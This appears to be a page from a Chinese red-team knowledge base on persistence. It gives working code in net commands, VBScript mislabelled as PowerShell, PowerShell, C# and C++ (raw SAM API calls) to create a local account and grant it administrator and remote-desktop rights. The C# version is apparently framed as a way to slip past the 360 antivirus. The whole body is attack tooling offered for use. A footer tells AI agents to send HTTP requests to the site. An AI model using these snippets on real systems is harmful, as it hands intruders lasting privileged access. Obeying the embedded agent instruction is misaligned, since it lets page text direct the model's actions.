# 新建用户 新建用户并添加管理员及远程访问权限 命令行: ``` net user qwqdanchun password /add /y net localgroup administrators qwqdanchun /add net localgroup "remote desktop users" qwqdanchun /add ``` Powershell: ``` set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","qwqdanchun") od.SetPassword "password" od.SetInfo Set of=GetObject(os&"/admin",user) oe.add os&"/admin" ``` Powershell(另一个版本): ``` $Username = "qwqdanchun" $P = "password" $Password = ConvertTo-SecureString $P -AsPlainText -Force New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user." Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun" ``` c#(使用系统 API 函数): ```csharp using System; using System.Runtime.InteropServices; namespace Bypass360Add { public static class BypassUAC_csharp { [DllImport("kernel32.dll")] static extern void ExitProcess(uint uExitCode); public static void Main(string[] args) { LocalGroupUserHelper local = new LocalGroupUserHelper(); string username = "qwqdanchun"; string password = "password"; string groupname = "Administrators"; local.AddUser(null, username, password, null); local.GroupAddMembers(null, groupname, username); ExitProcess(1); } } public class LocalGroupUserHelper { [DllImport("Netapi32.dll")] extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err); [DllImport("Netapi32.dll")] extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname, int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries); [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct LOCALGROUP_MEMBERS_INFO_3 { public string domainandname; // //lgrmi3_domainandname } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct USER_INFO_1 { public string usri1_name; public string usri1_password; public int usri1_password_age; public int usri1_priv; public string usri1_home_dir; public string comment; public int usri1_flags; public string usri1_script_path; } public void AddUser(string serverName, string userName, string password, string strComment) { USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例 NewUser.usri1_name = userName; // Allocates the username NewUser.usri1_password = password; // allocates the password NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER NewUser.usri1_home_dir = null; // We didn't supply a Home Directory NewUser.comment = strComment; // Comment on the User NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0 { Console.WriteLine("Error Adding User"); } } public void GroupAddMembers(string serverName, string groupName, string userName) { LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3(); NewMember.domainandname = userName; if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0 { Console.WriteLine("Error Adding Group Member"); } } } } ``` c++(重写AddUser): ```cpp #include "ApiAddUser.h" int wmain(int argc, wchar_t* argv[]) { UNICODE_STRING UserName; UNICODE_STRING PassWord; HANDLE ServerHandle = NULL; HANDLE DomainHandle = NULL; HANDLE UserHandle = NULL; ULONG GrantedAccess; ULONG RelativeId; NTSTATUS Status = NULL; HMODULE hSamlib = NULL; HMODULE hNtdll = NULL; HMODULE hNetapi32 = NULL; LSA_HANDLE hPolicy = NULL; LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 }; PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL; USER_ALL_INFORMATION uai = { 0 }; hSamlib = LoadLibraryA("samlib.dll"); hNtdll = LoadLibraryA("ntdll"); pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect"); pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain"); pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain"); pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser"); pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject"); pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString"); RtlInitUnicodeString(&UserName, L"Admin"); RtlInitUnicodeString(&PassWord, L"Admin"); Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);; Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy); Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo); Status = SamOpenDomain(ServerHandle, DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, DomainInfo->DomainSid, &DomainHandle); Status = SamCreateUser2InDomain(DomainHandle, &UserName, USER_NORMAL_ACCOUNT, USER_ALL_ACCESS | DELETE | WRITE_DAC, &UserHandle,&GrantedAccess,&RelativeId); RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer); uai.NtPasswordPresent = TRUE; uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT; Status = SamSetInformationUser(UserHandle, UserAllInformation, &uai); return 0; } ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.qwqdanchun.com/main/persistence/user/add-user.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.